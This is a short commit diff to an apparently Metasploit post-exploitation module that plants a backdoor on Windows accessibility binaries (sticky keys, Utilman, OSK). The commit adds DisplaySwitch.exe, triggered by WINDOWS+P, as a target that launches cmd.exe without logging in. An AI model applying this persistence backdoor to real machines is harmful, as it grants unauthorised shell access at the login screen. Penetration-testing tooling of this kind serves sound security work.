Add DisplaySwitch.exe support with WINDOWS+P

As per @mubix's request.
bug/bundler_fix
OJ 2015-07-24 07:20:31 +10:00
parent 1dd765d6e6
commit e60f590f09
1 changed files with 8 additions and 3 deletions

View File

@ -26,8 +26,9 @@ class Metasploit4 < Msf::Post
The module options allow for this hack to be applied to:
- SETHC - sethc.exe is invoked when SHIFT is pressed 5 times.
- UTILMAN - utilman.exe is invoked by pressing WINDOWS+U
- UTILMAN - Utilman.exe is invoked by pressing WINDOWS+U.
- OSK - osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard.
- DISP - DisplaySwitch.exe is invoked by pressing WINDOWS+P.
The hack can be added using the ADD action, and removed with the REMOVE action.
@ -42,7 +43,7 @@ class Metasploit4 < Msf::Post
register_options([
OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK']]),
OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
], self.class)
end
@ -53,9 +54,11 @@ class Metasploit4 < Msf::Post
def get_target_exe_name
case datastore['TARGET']
when 'UTILMAN'
'utilman.exe'
'Utilman.exe'
when 'OSK'
'osk.exe'
when 'DISP'
'DisplaySwitch.exe'
else
'sethc.exe'
end
@ -70,6 +73,8 @@ class Metasploit4 < Msf::Post
'WINDOWS+U'
when 'OSK'
'WINDOWS+U, then launching the on-screen keyboard'
when 'DISP'
'WINDOWS+P'
else
'SHIFT 5 times'
end